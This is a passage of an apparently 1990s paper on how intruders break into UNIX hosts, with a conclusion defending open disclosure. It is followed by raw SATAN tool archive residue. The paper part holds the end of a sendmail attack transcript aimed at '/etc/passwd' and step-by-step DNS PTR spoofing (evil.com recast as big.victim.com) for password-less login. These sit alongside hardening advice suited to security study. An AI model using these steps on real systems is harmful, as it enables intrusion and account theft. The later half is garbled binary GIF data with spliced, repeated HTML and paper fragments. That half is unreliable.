/etc/passwd"... Sender ok rcpt to: nosuchuser 550 nosuchuser... User unknown data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit Connection closed by foreign host. evil % At the time of writing, version 8.6.10 of sendmail (see Appendix D for information on how to get this) is reportedly the only variant of sendmail with all of the recent security bugs fixed. Trust ----- For our final topic of vulnerability, we'll digress from the practical strategy we've followed previously to go a bit more into the theoretical side, and briefly discuss the notion of trust. The issues and implications of vulnerabilities here are a bit more subtle and far-reaching than what we've covered before; in the context of this paper we use the word trust whenever there is a situation when a server (note that any host that allows remote access can be called a server) can permit a local resource to be used by a client without password authentication when password authentication is normally required. In other words, we arbitrarily limit the discussion to clients in disguise. There are many ways that a host can trust: .rhosts and hosts.equiv files that allow access without password verification; window servers that allow remote systems to use and abuse privileges; export files that control access via NFS, and more. Nearly all of these rely on client IP address to hostname conversion to determine whether or not service is to be granted. The simplest method uses the /etc/hosts file for a direct lookup. However, today most hosts use either DNS (the Domain Name Service), NIS, or both for name lookup service. A reverse lookup occurs when a server has an IP address (from a client host connecting to it) and wishes to get the corresponding client hostname. Although the concept of how host trust works is well understood by most system administrators, the _dangers_ of trust, and the _practical_ problem it represents, irrespective of hostname impersonation, is one of the least understood problems we know of on the Internet. This goes far beyond the obvious hosts.equiv and rhosts files; NFS, NIS, windowing systems -- indeed, much of the useful services in UNIX are based on the concept that well known (to an administrator or user) sites are trusted in some way. What is not understood is how networking so tightly binds security between what are normally considered disjoint hosts. Any form of trust can be spoofed, fooled, or subverted, especially when the authority that gets queried to check the credentials of the client is either outside of the server's administrative domain, or when the trust mechanism is based on something that has a weak form of authentication; both are usually the case. Obviously, if the host containing the database (either NIS, DNS, or whatever) has been compromised, the intruder can convince the target host that s/he is coming from any trusted host; it is now sufficient to find out which hosts are trusted by the target. This task is often greatly helped by examining where system administrators and system accounts (such as root, etc.) last logged in from. Going back to our target, victim.com, you note that root and some other system accounts logged in from big.victim.com. You change the PTR record for evil.com so that when you attempt to rlogin in from evil.com to victim.com, victim.com will attempt to look up your hostname and will find what you placed in the record. If the record in the DNS database looks like: 1.192.192.192.in-addr.arpa IN PTR evil.com And you change it to: 1.192.192.192.in-addr.arpa IN PTR big.victim.com then, depending on how naive victim.com's system software is, victim.com will believe the login comes from big.victim.com, and, assuming that big.victim.com is in the /etc/hosts.equiv or /.rhosts files, you will be able to login without supplying a password. With NIS, it is a simple matter of either editing the host database on the NIS master (if this is controlled by the intruder) or of spoofing or forcing NIS (see discussion on NIS security above) to supply the target with whatever information you desire. Although more complex, interesting, and damaging attacks can be mounted via DNS, time and space don't allow coverage of these methods here. Two methods can be used to prevent such attacks. The first is the most direct, but perhaps the most impractical. If your site doesn't use any trust, you won't be as vulnerable to host spoofing. The other strategy is to use cryptographic protocols. Using the secure RPC protocol (used in secure NFS, NIS+, etc.) is one method; although it has been "broken" cryptographically, it still provides better assurance than RPC authentication schemes that do not use any form of encryption. Other solutions, both hardware (smartcards) and software (Kerberos), are being developed, but they are either incomplete or require changes to system software. Appendix B details the results of an informal survey taken from a variety of hosts on the Internet. Protecting the system --------------------- It is our hope that we have demonstrated that even some of the most seemingly innocuous services run can offer (sometimes unexpectedly) ammunition to determined system crackers. But, of course, if security were all that mattered, computers would never be turned on, let alone hooked into a network with literally millions of potential intruders. Rather than reiterating specific advice on what to switch on or off, we instead offer some general suggestions: o If you cannot turn off the finger service, consider installing a modified finger daemon. It is rarely necessary to reveal a user's home directory and the source of last login. o Don't run NIS unless it's absolutely necessary. Use NFS as little as possible. o Never export NFS filesystems unrestricted to the world. Try to export file systems read-only where possible. o Fortify and protect servers (e.g. hosts that provide a service to other hosts -- NFS, NIS, DNS, whatever.) Only allow administrative accounts on these hosts. o Examine carefully services offered by inetd and the portmapper. Eliminate any that aren't explicitly needed. Use Wietse Venema's inetd wrappers, if for no other reason than to log the sources of connections to your host. This adds immeasurably to the standard UNIX auditing features, especially with respect to network attacks. If possible, use the loghost mechanism of syslog to collect security-related information on a secure host. o Eliminate trust unless there is an absolute need for it. Trust is your enemy. o Use shadow passwords and a passwd command that disallows poor passwords. Disable or delete unused/dormant system or user accounts. o Keep abreast of current literature (see our suggested reading list and bibliography at the end of this paper) and security tools; communicate to others about security problems and incidents. At minimum, subscribe to the CERT mailing list and phrack magazine (plus the firewalls mailing list, if your site is using or thinking about installing a firewall) and read the usenet security newsgroups to get the latest information on security problems. Ignorance is the deadliest security problem we are aware of. o Install all vendor security patches as soon as possible, on all of your hosts. Examine security patch information for other vendors - many bugs (rdist, sendmail) are common to many UNIX variants. It is interesting to note that common solutions to security problems such as running Kerberos or using one-time passwords or digital tokens are ineffective against most of the attacks we discuss here. We heartily recommend the use of such systems, but be aware that they are _not_ a total security solution -- they are part of a larger struggle to defend your system. Conclusions ----------- Perhaps none of the methods shown here are surprising; when writing this paper, we didn't learn very much about how to break into systems. What we _did_ learn was, while testing these methods out on our own systems and that of friendly sites, just how effective this set of methods is for gaining access to a typical (UNIX) Internet host. Tiring of trying to type these in all by hand, and desiring to keep our own systems more secure, we decided to implement a security tool (SATAN) that attempts to check remote hosts for at least some of the problems discussed here. The typical response, when telling people about our paper and our tool was something on the order of "that sounds pretty dangerous -- I hope you're not going to give it out to everybody. But you since you can trust me, may I have a copy of it?" We never set out to create a cookbook or toolkit of methods and programs on how to break into systems -- instead, we saw that these same methods were being used, every day, against ourselves and against friendly system administrators. We believe that by propagating information that normally wasn't available to those outside of the underworld, we can increase security by raising awareness. Trying to restrict access to "dangerous" security information has never seemed to be a very effective method for increasing security; indeed, the opposite appears to be the case, since the system crackers have shown little reticence to share their information with each other. While it is almost certain that some of the information presented here is new material to (aspiring) system crackers, and that some will use it to gain unauthorized entrance onto hosts, the evidence presented even by our ad hoc tests shows that there is a much larger number of insecure sites, simply because the system administrators don't know any better -- they aren't stupid or slow, they simply are unable to spend the very little free time that they have to explore all of the security issues that pertain to their systems. Combine that with no easy access to this sort of information and you have poorly defended systems. We (modestly) hope that this paper will provide badly-needed data on how systems are broken into, and further, to explain _why_ certain steps should be taken to secure a system. Knowing why something is a problem is, in our opinion, the real key to learning and to making an informed, intelligent choice as to what security really means for your site. ---- Appendix A: SATAN (Security Analysis Tool for Auditing Networks) Originally conceived some years ago, SATAN is actually the prototype of a much larger and more comprehensive vision of a security tool. In its current incarnation, SATAN remotely probes and reports various bugs and weaknesses in network services and windowing systems, as well as detailing as much generally useful information as possible about the target(s). It then processes the data with a crude filter and what might be termed an expert system to generate the final security analysis. While not particularly fast, it is extremely modular and easy to modify. SATAN consists of several sub-programs, each of which is an executable file (perl, shell, compiled C binary, whatever) that tests a host for a given potential weakness. Adding further test programs is as simple as putting an executable into the main directory with the extension ".satan"; the driver program will automatically execute it. The driver generates a set of targets (using DNS and a fast version of ping together to get "live" targets), and then executes each of the programs over each of the targets. A data filtering/interpreting program then analyzes the output, and lastly a reporting program digests everything into a more readable format. The entire package, including source code and documentation, has been made freely available to the public, via anonymous ftp and by posting it to one of the numerous source code groups on the Usenet. ---- Appendix B: An informal survey conducted on about a dozen Internet sites (educational, military, and commercial, with over 200 hosts and 40000 accounts) revealed that on the average, close to 10 percent of a site's accounts had .rhosts files. These files averaged six trusted hosts each; however, it was not uncommon to have well over one hundred entries in an account's .rhosts file, and on a few occasions, the number was over five hundred! (This is not a record one should be proud of owning.) In addition, _every_ site directly on the internet (one site was mostly behind a firewall) trusted a user or host at another site -- thus, the security of the site was not under the system administrators direct control. The larger sites, with more users and hosts, had a lower percentage of users with .rhosts files, but the size of .rhosts files increased, as well as the number of trusted off-site hosts. Although it was very difficult to verify how many of the entries were valid, with such hostnames such as "Makefile", "Message-Id:", and "^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as quite a few wildcard entries, we question the wisdom of putting a site's security in the hands of its users. Many users (especially the ones with larger .rhosts files) attempted to put shell-style comments in their .rhosts files, which most UNIX systems attempt to resolve as valid host names. Unfortunately, an attacker can then use the DNS and NIS hostname spoofing techniques discussed earlier to set their hostname to "#" and freely log in. This puts a great many sites at risk (at least one major vendor ships their systems with comments in their /etc/hosts.equiv files.) You might think that these sites were not typical, and, as a matter of fact, they weren't. Virtually all of the administrators knew a great deal about security and write security programs for a hobby or profession, and many of the sites that they worked for did either security research or created security products. We can only guess at what a "typical" site might look like. ---- Appendix C: After receiving mail from a site that had been broken into from one of our systems, an investigation was started. In time, we found that the intruder was working from a list of ".com" (commercial) sites, looking for hosts with easy-to steal password files. In this case, "easy-to-steal" referred to sites with a guessable NIS domainname and an accessible NIS server. Not knowing how far the intruder had gotten, it looked like a good idea to warn the sites that were in fact vulnerable to password file theft. Of the 656 hosts in the intruder's hit list, 24 had easy-to-steal password files -- about one in twenty-five hosts! One third of these files contained at least one password-less account with an interactive shell. With a grand total of 1594 password-file entries, a ten-minute run of a publically-available password cracker (Crack) revealed more than 50 passwords, using nothing but a low-end Sun workstation. Another 40 passwords were found within the next 20 minutes; and a root password was found in just over an hour. The result after a few days of cracking: five root passwords found, 19 out of 24 password files (eighty percent) with at least one known password, and 259 of 1594 (one in six) passwords guessed. ---- Appendix D: How to get some free security resources on the Internet Mailing lists: o The CERT (Computer Emergency Response Team) advisory mailing list. Send e-mail to cert@cert.org, and ask to be placed on their mailing list. o The Phrack newsletter. Send an e-mail message to phrack@well.sf.ca.us and ask to be added to the list. o The Firewalls mailing list. Send the following line to majordomo@greatcircle.com: subscribe firewalls o Computer Underground Digest. Send e-mail to tk0jut2@mvs.cso.niu.edu, asking to be placed on the list. Free Software: COPS (Computer Oracle and Password System) is available via anonymous ftp from archive.cis.ohio-state.edu, in pub/cops/1.04+. The tcp wrappers are available via anonymous ftp from ftp.win.tue.nl, in pub/security. Crack is available from ftp.uu.net, in /usenet/comp.sources.misc/volume28. TAMU is a UNIX auditing tool that is part of a larger suite of excellent tools put out by a group at the Texas A&M University. They can be gotten via anonymous ftp at net.tamu.edu, in pub/security/TAMU. Sources for ftpd and many other network utilities can be found in ftp.uu.net, in packages/bsd-sources. Source for ISS (Internet Security Scanner), a tool that remotely scans for various network vulnerabilities, is available via anonymous ftp from ftp.uu.net, in usenet/comp.sources.misc/volume40/iss. Securelib is available via anonymous ftp from ftp.uu.net, in usenet/comp.sources.misc/volume36/securelib. The latest version of berkeley sendmail is available via anonymous ftp from ftp.cs.berkeley.edu, in ucb/sendmail. Tripwire, a UNIX filesystem integrity checker+, is available via anonymous ftp at ftp.cs.purdue.edu, in pub/spaf/COAST/Tripwire. ---- Bibliography: Baldwin, Robert W., Rule Based Analysis of Computer Security, Massachusetts Institute of Technology, June 1987. Bellovin, Steve, Using the Domain Name System for System Break-ins, 1992 (unpublished). Massachusetts Institute of Technology, X Window System Protocol, Version 11, 1990. Shimomura, Tsutomu, private communication. Sun Microsystems, OpenWindows V3.0.1 User Commands, March 1992. ---- Suggested reading: Bellovin, Steve -- "Security Problms in the TCP/IP Protocol Suite", Computer Communication Review 19 (2), 1989; a comment by Stephen Kent appears in volume 19 (3), 1989. Garfinkel, Simson and Spafford, Gene, "Practical UNIX Security", O'Reilly and Associates, Inc., 1992. Hess, David, Safford, David, and Pooch, Udo, "A UNIX Network Protocol Study: Network Information Service", Computer Communication Review 22 (5) 1992. Phreak Accident, Playing Hide and Seek, UNIX style, Phrack, Volume Four, Issue Forty-Three, File 14 of 27. Ranum, Marcus, "Firewalls" internet electronic mailing list, Sept 1993. Schuba, Christoph, "Addressing Weaknesses in the Domain Name System Protocal", Purdue University, August 1993. Thompson, Ken, Reflections on Trusting Trust, Communications of the ACM 27 (8), 1984. </pre> </BODY> </HTML> he intruder was working from a list of ".com" (commercial) sites, looking for hosts with easy-to steal password files. In this case, "easy-to-steal" referred to sites with a guessable NIS domainname and an accessiblsatan-1.1.1/html/docs/satan_overview.html........................................................... 600 . 465 . 506 . 5517 5740027651 13525. ............................................................................................ ................................................................................................................................................................................................................................................................. .......<HTML> <HEAD> <title> SATAN Overview </title> <LINK REV="made" HREF="mailto:satan@fish.com"> </HEAD> <BODY> <H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]"> SATAN Overview </H1> <H2>(Security Administrator Tool for Analyzing Networks)</H2> <HR> <OL> <LI><A HREF="intro.html"><STRONG>Introduction</STRONG></A> <OL> <LI><A HREF="intro.html#what-is-satan">What is SATAN?</A> <LI><A HREF="intro.html#who-should-use">Who should use it?</A> <LI><A HREF="intro.html#how-does-it-work">How does it work?</A> </OL> <p> <LI><A HREF="trust.html"><STRONG>The most important concept - trust</STRONG></A> <p> <LI><A HREF="getting_started.html"><STRONG>Getting started</STRONG></A> <OL> <LI><A HREF="getting_started.html#what-you-need">What you need to do to .run SATAN even if you don't want to read documentation</A> <LI><A HREF="getting_started.html#getting-n-compiling">Getting and compiling .all those programs if you don't have them already</A> <LI><A HREF="getting_started.html#satan-files">What are all the files for?</A> </OL> <p> <LI><A HREF="system_requirements.html"><STRONG>System requirements</STRONG></A> <OL> <LI><A HREF="system_requirements.html#OS">OS</A> <LI><A HREF="system_requirements.html#Hardware">Platform</A> <LI><A HREF="system_requirements.html#diskspace">Disk space</A> <LI><A HREF="system_requirements.html#memory">Memory</A> <LI><A HREF="system_requirements.html#other-requirements">Required software tools</A> </OL> <p> <LI><A HREF="dangers.html"><STRONG>Dangers of SATAN</STRONG></A> <OL> <LI><A HREF="dangers.html#leashing-satan">Controlling SATAN</A> <LI><A HREF="dangers.html#boundary">Boundary issues - keeping track of where it goes</A> <LI><A HREF="dangers.html#being-friendly">Being a very unfriendly neighbor</A> <LI><A HREF="dangers.html#attack-or-not">Attacking vs. probing vs. scanning</A> <LI><A HREF="dangers.html#legal">Legal problems with running SATAN</A> </OL> <p> <LI><A HREF="design.html"><STRONG>Design goals</STRONG></A> <OL> <LI><A HREF="design.html#toolkit">Toolkit approach</A> <LI><A HREF="design.html#speed-optimization">Speed/optimization</A> </OL> <p> <LI><A HREF="philosophy.html"><STRONG>Philosophical Musings</STRONG></A> <OL> <LI><A HREF="philosophy.html#why-build">Why build it?</A> <LI><A HREF="philosophy.html#why-scan">Why does it scan sites other than your own?</A> <LI><A HREF="philosophy.html#white-hats">Why wasn't there a limited distribution, to only the "white hats"?</A> <LI><A HREF="philosophy.html#future">Future directions</A> </OL> <p> <LI><STRONG>References, Acknowledgements</STRONG> <OL> <LI><A HREF="acknowledgements.html">Acknowledgements and dedications</A> <LI><A HREF="references.html">References</A> <LI><A HREF="copyright.html">Copyright notice</A> <LI><A HREF="authors.html">About the authors</A> </OL> <p> <hr> <a href="../satan_documentation.html"> Back to the Documentation TOC</a> </BODY> </HTML> l, Version 11, 1990. Shimomura, Tsutomu, private communication. Sun Microsystems, OpenWindows V3.0.1 User Commands, March 1992. ---- Suggested reading: Bellovin, Steve -- "satan-1.1.1/html/dots/.............................................................................. 700 . 465 . 506 . 0 5742521541 7524. ................................................................................. ................................................................................................................................................................................................................................................................. ..................satan-1.1.1/html/dots/blackdot.gif.................................................................. 600 . 465 . 506 . 162 5731343036 12043. ................................................................................... ................................................................................................................................................................................................................................................................. ................GIF89a....┬........÷÷÷ ........................................................................................................................................................................................................................ !∙......,..........7x║▄.L.céxé.b╞ì.!v.3.E┴ .└lΓ┌║ïF▒@n▓|«/é₧..h.σ╣óπΦSB₧╨E..;.l..τ╝....dot.gif....Ç..τ╜....eyeball.gif....ÿ..τ╛....greendot.gif...╗...░..τ┐... orangedot.gif..v...╚..τ└....orig.devil.gif.v...▄..τ┴....pinkdot.gif....⌠..τ┬... purpledot.gif.ov......τ├... reddot.gif.a... ..τ─....whitedot.gif.ata......τ┼... yellowdot.gif...ATAN?</A> <LI><A HREF="intro.html#who-should-use">Who should use it?</A> <LI><A HREF="intro.html#how-does-it-work">How does it work?</A> </Osatan-1.1.1/html/dots/bluedot.gif................................................................... 600 . 465 . 506 . 234 5731343036 11716. .................................................................................................. ................................................................................................................................................................................................................................................................. .GIF89a....π..rl╔JJ¢..é.....ZΣ┼╪..═..Σ........................................................................................................................................................................................................................... ....╬:8╫..╓..J....║!∙......,..........I0╔I½╜.,Ñ.╕Ç1îç±e"▓ %sJ╦Ç..b<îC)≥¬α.┬ε@╝1é┬╔Γ┴...║.ÇA.8₧ì@.@Φ6╛Z.αJpΣ1Φ⌠$..;..τ└....orig.devil.gif.f...▄..τ┴....pinkdot.gif....⌠..τ┬... purpledot.gif.ev......τ├... reddot.gif.k... ..τ─....whitedot.gif.edo......τ┼... yellowdot.gif..gif.a... ..τ─....whitedot.gif.ata......τ┼... yellowdot.gif...ATAN?</A> <LI><A HREF="intro.html#who-should-use">Who should use it?</A> <LI><A HREF="intro.html#how-does-it-work">How does it work?</A> </Osatan-1.1.1/html/dots/browndot.gif.................................................................. 600 . 465 . 506 . 167 5731343036 12123. .................................................................................................. ................................................................................................................................................................................................................................................................. .GIF89a....┬..[..εƒƒÆÉ┼╢.L\>B∩%12╧H┐┐┐!∙......,..........<x║▄.0.Q.)Γ.├à.Aπ.E∙ ┘RÉ╩J..CP&1.ÇL.╗ìτ*╦α≤.*.░".╡.(a.Σ┼)⌐Z%..;ot.gif..░...╚..τ└....orig.devil.gif.╚...▄..τ┴....pinkdot.gif....⌠..τ┬... purpledot.gif..⌠......τ├... reddot.gif.v... ..τ─....whitedot.gif... ......τ┼... yellowdot.gif.....τ┼... yellowdot.gif..gif.a... ..τ─....whitedot.gif.ata......τ┼... yellowdot.gif...ATAN?</A> <LI><A HREF="intro.html#who-should-use">Who should use it?</A> <LI><A HREF="intro.html#how-does-it-work">How does it work?</A> </Osatan-1.1.1/html/dots/dot.gif....................................................................... 600 . 465 . 506 . 177 5731343036 11054. .................................................................................................. ................................................................................................................................................................................................................................................................. .GIF87a....┬..¥o~..w╦Γ═├╪─ .═º╛⌐â╓à░┼,..........Lx║7≥≡▒σ"£jh.' D`l▄.Çh..à╢Ç┴.ï∞á|⌐.│┼¥╟1ÇüσC.üσaQçL÷n╟cRy..Ç┬)qa═Nç-┼╫┘▓yx╝M..;░...▄..τ┴....pinkdot.gif....⌠..τ┬... purpledot.gif.f.......τ├... reddot.gif.i... ..τ─....whitedot.gif.f.v......τ┼... yellowdot.gif.. ......τ┼... yellowdot.gif.....τ┼... yellowdot.gif..gif.a... ..τ─....whitedot.gif.ata......τ┼... yellowdot.gif...ATAN?</A> <LI><A HREF="intro.html#who-should-use">Who should use it?</A> <LI><A HREF="intro.html#how-does-it-work">How does it work?</A> </Osatan-1.1.1/html/dots/eyeball.gif................................................................... 600 . 465 . 506 . 321 5731343036 11672. .................................................................................................. ................................................................................................................................................................................................................................................................. .GIF89a....Σ.....ssskkkccc▐▐▐╞╞╞£££÷÷÷ΣΣΣZZZ..................................................................................................................................................................................................................... .GIF89a....Σ.....ssskkkccc▐▐▐╞╞╞£££÷÷÷ΣΣΣZZZ..................................................................................................................................................................................................................... .GIF89a....Σ.....ssskkkccc▐▐▐╞╞╞£££÷÷÷ΣΣΣZZZ..................................................................................................................................................................................................................... JJJ∩∩∩τττ╧╧╧╜╜╜..ssskkkccc▐▐▐╞╞╞£££÷÷÷ΣΣΣZZZ..................................................................................................................................................................................................................... .............................................!∙......,..........Ná#─dI..èÜ*α¬¼"3┼*¬▓▄.σ¥µ .Σq@¼\9ê.éH┤.ΣFC.Ç.£7└cKà,.6└┴P...«ô@É8ú}╖@".σ┼^iô₧...;.τ─......τ┼... yellowdot.gif.τ┼... yellowdot.gif.. ......τ┼... yellowdot.gif.....τ┼... yellowdot.gif..gif.a... ..τ─....whitedot.gif.ata......τ┼... yellowdot.gif...ATAN?</A> <LI><A HREF="intro.html#who-should-use">Who should use it?</A> <LI><A HREF="intro.html#how-does-it-work">How does it work?</A> </Osatan-1.1.1/html/dots/greendot.gif.................................................................. 600 . 465 . 506 . 233 5731343036 12066. .................................................................................................. ................................................................................................................................................................................................................................................................. .GIF89a....π......╓. ê/.⌡..J..................................................................................................................................................................................................................................... &.Z..Σ. ╬%.├..┘.}╙à.m.H╬Z ╓. ê/.⌡..J..................................................................................................................................................................................................................................... <...!∙......,..........H.╚I½╜t5Σ┌║ïRîC≥ebß.epJ═╕,─Æ..àî─â▄.âN1P╪p.ßñæh.É.Fµëc..ΣFe┴░b..É╒└╨b╬hJ..;gif.┬... ..τ─....whitedot.gif... ......τ┼... yellowdot.gif.....τ┼... yellowdot.gif.τ┼... yellowdot.gif.. ......τ┼... yellowdot.gif.....τ┼... yellowdot.gif..gif.a... ..τ─....whitedot.gif.ata......τ┼... yellowdot.gif...ATAN?</A> <LI><A HREF="intro.html#who-should-use">Who should use it?</A> <LI><A HREF="intro.html#how-does-it-work">How does it work?</A> </Osatan-1.1.1/html/dots/orangedot.gif................................................................. 600 . 465 . 506 . 231 5731343036 12237. .................................................................................................. ................................................................................................................................................................................................................................................................. .GIF89a....π..╕h.╔t.Z4.█¼q╬─6âK..─.σ╓5ïe1m@.▌..ÿ................................................................................................................................................................................................................ òV.J*....!∙......,..........FÉ╔I½╜tÉ.╚╕âbîF≡eü▒.ï.4ºD¿├╨.MAÑδ¥.;à0Ç+.Ç..`Y.8.╓σ┤Ép:.òAóΩΦb-┌cΓï)¢'..;gif.f.┬......τ┼... yellowdot.gif.. ......τ┼... yellowdot.gif.....τ┼... yellowdot.gif.τ┼... yellowdot.gif.. ......τ┼... yellowdot.gif.....τ┼... yellowdot.gif..gif.a... ..τ─....whitedot.gif.ata......τ┼... yellowdot.gif...ATAN?</A> <LI><A HREF="intro.html#who-should-use">Who should use it?</A> <LI><A HREF="intro.html#how-does-it-work">How does it work?</A> </Osatan-1.1.1/html/dots/orig.devil.gif................................................................ 600 . 465 . 506 . 3240 5731343036 12342. .................................................................................................. ................................................................................................................................................................................................................................................................. .GIF87aD.t.≥../..∙ìîσ..º..j..≤@:═ .┐┐┐,....D.t....x║▄.0╩I½╜8k.@╪`╚t. ₧....±íA!.Φ╙╡╞░óφ@╨╡Fg`(╢^í└`≡A..+â@É..N.┴∩)..º.k└ë∙à╔╧..╝tan.é....èRc╣ñ╓╓╕#j_go+rvtA*DRS.W.vr>%ÇüYâ.É..K₧@û %wâ9¢..ôÆí$KxKë.?₧>?▓0úÿU4╕ C»÷╛╣ñys.+.>╢úí.ú─░º..9Æ*n╬⌐─î,.$wƒúò╬ú.TDm▓|Θç+%├I╔T░┘6ú╓?║± ╨╤∙.°.≥dhç╢.N.┴∩)..º.k└ë∙à╔╧..╝tan.é....èRc╣ñ╓╓╕#j_go+rvtA*DRS.W.vr>%ÇüYâ.É..K₧@û ≡╚.G+▀-gP.~æ.P.¡O*<┤B8.Ñ@─".-╓jc'÷╣─EûLc└º╧.tê6f╤$├SHCv.æ.┼┼.╜O...Li½. l╤j∙╩Θ⌐ Fì52▓HWk╦Σ£ôF┌Γ)Bd╒c¿.m╒╩$¬E¼1'£%9Æ£.8=û.ΓJM╫╓¼U.n.S"╪╬ç╚╬Γm÷Æ_.⌐2÷9╡π÷¢αï/ºX┘█⌐àΓ÷½Γ╡─ym...σ.░H.&╠]{─.Ωôñ╙OΦ.1.ƒâige╨w┼!/Y1σ┬ÿT▒=Jªe⌡é╨k ¥≥æ U¬ò┘╢└^h╣║≤D-P∩Θ2ñ╔ÿ8║j╖.ªB/πmï.╣UE]ü║╘╛x≥┴{ ^Mi╙φ⌠NW=εb..w.ÿP@.44ç.y╝P┬^.$α&₧gN)(PAr.╞êC¢i@▌f∞4eì.╩Σ╚┌9.▌╒╥k░q8─H┤╔æÿàV.│╪*ìYáΓè.Iæ.-▓╤$¢Nÿ╤êbâ+b#V#.yÆXl1─ÉG|╓ù.ç·Pê.MU.±█û2tD":raô.æ½0F╦g▓m9╞ï`╚..Fb.╖.64╩±┘sMrΘQù$µü▀_░╔⌐Z÷╧╤≤ê.j2.├gì.j└.-Φ.H.D║º╒Æê.¿h pl^yτiτ▌hQ|K.▓µÜÜ╞╓&#m*â\q tHÑ@»<▓%lzj┌eG≈φ¬.V┘uí╩£┤µæjoº╩.╓#Mm.─.%¼─┌.ì╘æw,ù┼X╦¼ù╠~ΦRFt4╪YF9┌:âeK.║╙.|╞α qΣj7(.ΣFaε5Z╞╢U.⌠ Z/g·╨AÑ.╪..Qtî..Θ(V<ùñèî╒╕└┐.µ@.ÉY┌Æª½╪╠.Θú.»û.╓.3â╨.σ*C½¢;.è╧┐─.`█£Z9ºô╓.Ü⌐èæ0╗.X.┤zHg¡~êJ≤╛=½╞#.⌡▓&┼XO.=gòR╗ñ.╨JW8╓\I▀╕Z╒}`6 ╔½ü.j─`╟∞5╩╥-@&╥.v v8&O(ê¢▐╨g.╣╚Ñφuw C∞┘─7═┼░8~sΦ░╩TπúI.yδìô{E.╨╓╕@4╣;5╩IΓó4uyUë╢╘x║[▌╓îz«6q.╫m⌠.╓╢ôpú(.ΣFaε5Z╞╢U.⌠ Z/g·╨AÑ.╪..Qtî..Θ(V<ùñèî╒╕└┐.µ@.ÉY┌Æª½╪╠.Θú.»û.╓.3â╨.σ*C½¢;.è╧┐─.`█£Z9ºô╓.Ü⌐èæ0╗.X.┤zHg¡~êJ≤╛=½╞#.⌡▓&┼XO.=gòR╗ñ.╨JW8╓\I▀╕Z╒}`6 ┘µ╢╧ƒ│.Σ¼╘!║&.|^╫╢.╝o(.ÿ.┐╫Iµ▒.O"╤Æb¡╞Φ┼é┘╞i.∙.▄í┴.Ñ·áì█ò.é┴LbφÇ║zy(Qô∙╞.┌ôΦ╚)¬╓╢Kú(.ΣFaε5Z╞╢U.⌠ Z/g·╨AÑ.╪..Qtî..Θ(V<ùñèî╒╕└┐.µ@.ÉY┌Æª½╪╠.Θú.»û.╓.3â╨.σ*C½¢;.è╧┐─.`█£Z9ºô╓.Ü⌐èæ0╗.X.┤zHg¡~êJ≤╛=½╞#.⌡▓&┼XO.=gòR╗ñ.╨JW8╓\I▀╕Z╒}`6 9╡FúB<ò.╘!≡⌠kÆ¢╪Σ⌐─░σ`>(.└é╓.N∙«{HRVg«σ.KE¼B┼╗╓oh╙(e.φ.q¬á]÷u╖.óo{╡ë ≈.─ç╫╠.JCï┼┼Σ.σLE╨Çêk╞ÿ╩⌡.╓4àWDü.i╬A─Üî.E..[;▓≥.┌æñ.╦Γòæ2ñ."AΦ.?≡B..¿σ -rδQB<ò.╘!≡⌠kÆ¢╪Σ⌐─░σ`>(.└é╓.N∙«{HRVg«σ.KE¼B┼╗╓oh╙(e.φ.q¬á]÷u╖.óo{╡ë ≈.─ç╫╠.JCï┼┼Σ.σLE╨Çêk╞ÿ╩⌡.╓4àWDü.i╬A─Üî.E..[;▓≥.┌æñ.╦Γòæ2ñ."AΦ.?≡B..¿σ BΓ█B7┴'µ¼.UPF..╥¢ Lφtû.Y°╬╢┐\dMgIc]╠Ç.-y<frkâû.àQâ;µNpax.╒j «)┬ïZ.δ█YZXH.┤Σ*xΦ.dDg8ëQσ3╕ë_y╝.,Ωy.ë,ëΣ._1╩ü].G.:A*6┘.Vzδr.Bσ3ªW>º¡▒Lsúó<«≈$.q -ß..%AÉ ╧,.σÇ4.Ç^'╚.÷`O╧¼╟..&╖E@Kù⌐`_i.G╩.B≥[R*D*<ÆÑFIH─..ß½û)B╓▒l _αX7aσ..)≡Ü,#EiHêK.Æ╦0dzDσD9.╣⌡'₧st.¥q£V₧£|ßâóB╬_PvPπ≡Ñ!┐î▀nµ&Ròx╚lbT%g.╖╧bP┴MÆY#* )I..Ç÷⌠è╠áeM.ßLÆó..?∩└.0.î╓»\`fñE│µ|ôæ>▌Aó╘ΣÇJA▓^OH.3│&*ê.│kα9@...;system_requirements.html#Hardware">Platform</A> <LI><A HREF="system_requirements.html#diskspace">Disk space</A> <LI><A HREF="system_requirements.html#memory">Memory</A> <LI><A HREF="system_requirements.html#other-requirements">Required software tools</A> </OL> <p> <LI><A HREF="dangers.html"><STRONG>Dangers of SATAN</STRONG></A> <OL> <LI><A HREF="dasatan-1.1.1/html/dots/pinkdot.gif................................................................... 600 . 465 . 506 . 166 5731343037 11735. ...................................................................................... ................................................................................................................................................................................................................................................................. .............GIF89a....┬..≤.╟╚Æ┐σ.n├.áù.üR.C∞.╞┐┐┐!∙......,..........;x║▄.,ÿ1LxaÇ ╞ì.`lâ≡)#.H÷ 0í1òB.smm/s^.»E└E...ìÇ╤êt.é&dJ]$..;llowdot.gif..ibâ+b#V#.yÆXl1─ÉG|╓ù.ç·Pê.MU.±█û2tD":raô.æ½0F╦g▓m9╞ï`╚..Fb.╖.64╩±┘sMrΘQù$µü▀_░╔⌐Z÷╧╤≤ê.j2.├gì.j└.-Φ.H.D║º╒Æê.¿hpl^yτiτ▌hQ|K.▓µÜÜ╞╓&#m*â\q tHÑ@»<▓%lzj┌eG≈φ¬.V┘uí╩£┤µæjoº╩.╓#Mm.─.%¼─┌.ì╘æw,ù┼X╦¼ù╠~ΦRFt4╪YF9┌:âeK.║╙.|╞α qΣj7(.ΣFaε5Z╞╢U.⌠ Z/g·╨AÑ.╪..Qtî..Θ(V<ùñèî╒╕└┐.µ@.ÉY┌Æª½╪╠.Θú.»û.╓.3â╨.σ*C½¢;.è╧┐─.`█£Z9ºô╓.Ü⌐èæ0╗.X.┤zHg¡~êJ≤╛=½╞#.⌡▓&┼XO.=gòR╗ñ.╨JW8╓\I▀╕Z╒}`6 ╔½ü.j─`╟∞5╩╥-@&╥.vsatan-1.1.1/html/dots/purpledot.gif................................................................. 600 . 465 . 506 . 231 5731343037 12274. ................................................................................... ................................................................................................................................................................................................................................................................. ................GIF89a....π..─ëß`.ëï.├£.▌▒.°╛╛╛ùD╝4.J«p╚.╕J.ip.¢x.ª».·@.Z...!∙......,..........F░╚I½╜..!.║╚╨îì≡eBC¼â░£Æí..1$K@Ñ½ì.─▌`(°)é.Cb∙s..╓à4áP..σ 